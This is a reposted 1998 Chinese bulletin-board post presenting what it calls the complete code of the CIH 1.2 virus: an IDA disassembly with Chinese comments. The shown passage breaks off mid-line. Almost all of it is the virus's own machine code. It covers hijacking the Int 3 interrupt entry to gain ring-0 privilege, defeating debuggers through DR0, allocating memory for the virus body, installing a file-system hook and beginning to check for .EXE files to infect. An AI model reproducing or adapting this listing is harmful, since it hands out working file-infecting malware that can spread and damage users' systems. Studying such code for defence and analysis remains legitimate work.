完整的cih1代码.txt

该文件夹里面重点描述了CIH病毒的源码和原理

发信人: TBsoft (TBsoft), 信区: Virus 
标  题: 完整的代码(CIH 1.2)[转载] 
发信站: 武汉白云黄鹤站 (Mon Oct 26 10:55:17 1998) , 站内信件 
  
发信人: Nova_Zhao@bbs.ustc.edu.cn (真生命), 信区: virus 
标 题: 完整的代码(CIH 1.2) 
发信站: 中国科大BBS站 (Sun Oct 25 10:38:09 1998) 
转信站: wuheebbs!ustcnews!ustcbbs 
  
; ?This file is generated by Interactive Disassembler (IDA) 
; ?Copyright (c) 1997 by DataRescue sprl, 
; 
  
Runtime Info 
;ESI :00400303 新的Int 3的处理入口， 
; 
  
  
p386 
004002A0 
004002A0 
004002A0 
004002A0 Seg0 segment word public 'CODE' use32 
004002A0 assume cs:Seg0 
004002A0 ;org 4002A0h 
004002A0 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing 
004002A0 55 push ebp 
004002A1 8D 44 24 F8 lea eax, [esp-8] 
004002A5 33 DB xor ebx, ebx 
004002A7 64 87 03 xchg eax, fs:[ebx] 
004002AA E8 00 00 00 00 call $+5 
004002AF 
004002AF 
004002AF 
004002AF ; S u b r o u t i n e 
004002AF 
004002AF sub_0_4002AF proc near 
004002AF 5B pop ebx 
004002B0 8D 4B 42 lea ecx, [ebx+42h] 
004002B3 51 push ecx 
004002B4 50 push eax 
004002B5 50 push eax ;这４字节作为缓冲区 
004002B6 0F 01 4C 24 FE sidt qword ptr [esp-2] ;取中断描述符表寄存器(48字节 
004002BB 5B pop ebx ;得到中断描述符表基址　　 
004002BC 83 C3 1C add ebx, 1Ch ;每个描述项占８字节　　　　 
004002BF FA cli ;加1C则指向Int 3的描述项 
004002C0 8B 2B mov ebp, [ebx] 　 
004002C2 66 8B 6B FC mov bp, [ebx-4] ;保存Int 3的处理入口于EBP中 
004002C6 8D 71 12 lea esi, [ecx+12h] ;取新的Int 3的处理入口于ESI 
004002C9 56 push esi 
004002CA 66 89 73 FC mov [ebx-4], si 
004002CE C1 EE 10 shr esi, 10h 
004002D1 66 89 73 02 mov [ebx+2], si 
004002D5 5E pop esi ;设置新的Int 3的处理入口， 
004002D6 CC int 3 
004002D7 56 push esi ;保存ESI 
004002D8 8B F0 mov esi, eax 
004002DA 
004002DA loc_0_4002DA: ;传送一块病毒体到申请的线性地址?CODE XREF: sub_0_4002AF+3 
9.j 
004002DA 8B 48 FC mov ecx, [eax-4] 
004002DD F3 A4 rep movsb ;传送完了么? 
004002DF 83 E8 08 sub eax, 8 
004002E2 8B 30 mov esi, [eax] ;完则跳转 
004002E4 0B F6 or esi, esi ;传送完了么? 
004002E6 74 02 jz short loc_0_4002EA ;完则跳转;本例中病毒体合计1003字 
004002E8 EB F0 jmp short loc_0_4002DA ;否则循环 
004002EA 
004002EA 
004002EA loc_0_4002EA: ; CODE XREF: sub_0_4002AF+37.j 
004002EA 5E pop esi ;恢复ESI 
004002EB CC int 3 ;安装文件监视的服务,Important,EDI = 1003 
004002EC FB sti ;置回Int 3的处理入口 
004002ED 33 DB xor ebx, ebx 
004002EF EB 07 jmp short loc_0_4002F8 
004002F1 
004002F1 33 DB xor ebx, ebx 
004002F3 64 8B 03 mov eax, fs:[ebx] 
004002F6 8B 20 mov esp, [eax] 
004002F8 
004002F8 loc_0_4002F8: ; CODE XREF: sub_0_4002AF+40.j 
004002F8 64 8F 03 pop dword ptr fs:[ebx] ;恢复原程序的运行 
004002FB 58 pop eax 
004002FC 5D pop ebp 
004002FD 68 AB 35 40 00 push 4035ABh 
00400302 C3 retn 
00400302 sub_0_4002AF endp 
00400302 
  
;新的Int 3的处理入口 
00400303 74 32 jz short loc_0_400337 
00400305 0F 21 C1 mov ecx, dr0 ;DR0调试断点一,检测调试程序 
00400308 E3 10 jecxz short loc_0_40031A ;无则跳转 
0040030A 83 04 24 15 add dword ptr [esp], 15h ;置回Int 3的处理入口 
0040030E 
0040030E loc_0_40030E: ; CODE XREF: Seg0:00400356.j 
0040030E 66 89 6B FC mov [ebx-4], bp 
00400312 C1 ED 10 shr ebp, 10h 
00400315 66 89 6B 02 mov [ebx+2], bp 
00400319 CF iret 
0040031A 
0040031A 
0040031A loc_0_40031A: ; CODE XREF: Seg0:00400308.j 
0040031A 0F 23 C3 mov dr0, ebx ;破坏追踪 
0040031D 6A 0F push 0Fh ;ECX必须为零，For PG_VM 
0040031F 51 push ecx ;VM Handle 
00400320 6A FF push 0FFFFFFFFh ;Physical address is a multi 
00400322 51 push ecx 
00400323 51 push ecx 
00400324 51 push ecx 
00400325 6A 01 push 1 
00400327 6A 02 push 2 ;PAGEUSEALIGN 
00400329 CD 20 int 20h ;申请一块线性内存 
0040032B 53 db 53h 
0040032C 00 db 0 
0040032D 01 db 1 ;INT 20 VXDCall _PageAllocate 
0040032E 00 db 0 
  
0040032F 83 C4 20 add esp, 20h 
00400332 97 xchg eax, edi ;基址置于EDI中 
00400333 8D 46 9D lea eax, [esi-63h] ;取第一块病毒体的地址 
00400336 CF iret 
00400337 
  
00400337 loc_0_400337: ; CODE XREF: Seg0:00400303.j 
00400337 8D 87 F7 FC FF FF lea eax, [edi-309h] ; 
0040033D 50 push eax 
0040033E CD 20 int 20h ;INT 20 VXDCall 
00400340 67 db 67h ;IFSMgr_InstallFileSystemApiHook 
00400341 00 db 0 ;安装文件监视的服务,Important!!!! 
00400342 40 db 40h 
00400343 00 db 0 
00400344 
00400344 0F 23 C0 mov dr0, eax 
00400347 58 pop eax 
00400348 8B 4E 3D mov ecx, [esi+3Dh] 
0040034B 8B 11 mov edx, [ecx] 
0040034D 89 50 FC mov [eax-4], edx 
00400350 8D 40 D6 lea eax, [eax-2Ah] 
00400353 89 01 mov [ecx], eax 
00400355 FA cli 
00400356 EB B6 jmp short loc_0_40030E 
00400358 
00400358 53 push ebx 
00400359 E8 00 00 00 00 call $+5 
0040035E 
  
0040035E sub_0_40035E proc near 
0040035E 5B pop ebx 
0040035F 83 C3 24 add ebx, 24h 
00400362 53 push ebx 
00400363 CD 20 int 20h ;INT 20 VXDCall 
00400365 68 db 68h ;IFSMgr_RemoveFileSystemApiHook; 
00400366 00 db 0 
00400367 40 db 40h 
00400368 00 db 0 
00400369 58 pop eax 
0040036A FF 74 24 08 push dword ptr [esp+8] 
0040036E FF 53 FC call dword ptr [ebx-4] 
00400371 59 pop ecx 
00400372 50 push eax 
00400373 53 push ebx 
00400374 FF 53 FC call dword ptr [ebx-4] 
00400377 59 pop ecx 
00400378 0F 23 C0 mov dr0, eax 
0040037B 58 pop eax 
0040037C 5B pop ebx 
0040037D C3 retn 
  
0040037E 1E push ds 
0040037F 38 db 38h 
00400380 02 db 2 
00400381 C0 db 0C0h ;may be data 
  
;文件监视的服务入口 
00400382 60 pusha 
00400383 E8 00 00 00 00 call $+5 
00400388 ;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹 
圹圹圹 
00400388 ; S u b r o u t i n e 
00400388 sub_0_400388 proc near 
00400388 5E pop esi ;at run time esi = E8 
00400389 81 C6 03 03 00 00 add esi, 303h ;esi = E8＋0x303 = 0x3EB =1003 
0040038F loc_0_40038F: ; CODE XREF: sub_0_400388+1.^ 
0040038F F6 06 01 test byte ptr [esi], 1 
00400392 0F 85 F0 01 00 00 jnz loc_0_400588 
00400398 8D 5C 24 28 lea ebx, [esp+28h] 
0040039C 83 3B 24 cmp dword ptr [ebx], 24h 
0040039F 0F 85 DD 01 00 00 jnz loc_0_400582 
004003A5 FE 06 inc byte ptr [esi] 
004003A7 83 C6 05 add esi, 5 
004003AA 56 push esi 
004003AB 8A 43 04 mov al, [ebx+4] 
004003AE 3C FF cmp al, 0FFh 
004003B0 74 08 jz short loc_0_4003BA 
004003B2 04 40 add al, 40h 
004003B4 B4 3A mov ah, 3Ah 
004003B6 89 06 mov [esi], eax 
004003B8 46 inc esi 
004003B9 46 inc esi 
004003BA loc_0_4003BA: ; CODE XREF: sub_0_400388+28.j 
004003BA 6A 00 push 0 
004003BC 6A 7F push 7Fh 
004003BE 8B 5B 10 mov ebx, [ebx+10h] 
004003C1 8B 43 0C mov eax, [ebx+0Ch] 
004003C4 83 C0 04 add eax, 4 
004003C7 50 push eax 
004003C8 56 push esi 
004003C9 CD 20 int 20h ;INT 20 VXDCall UniToBCSPath 
004003CB 41 db 41h 
004003CC 00 db 0 
004003CD 40 db 40h 
004003CE 00 db 0 
  
004003CF 83 C4 10 add esp, 10h 
004003D2 81 7C 06 FC 2E 45 58 45 cmp dword ptr [esi+eax-4], 4558452Eh ;判断是否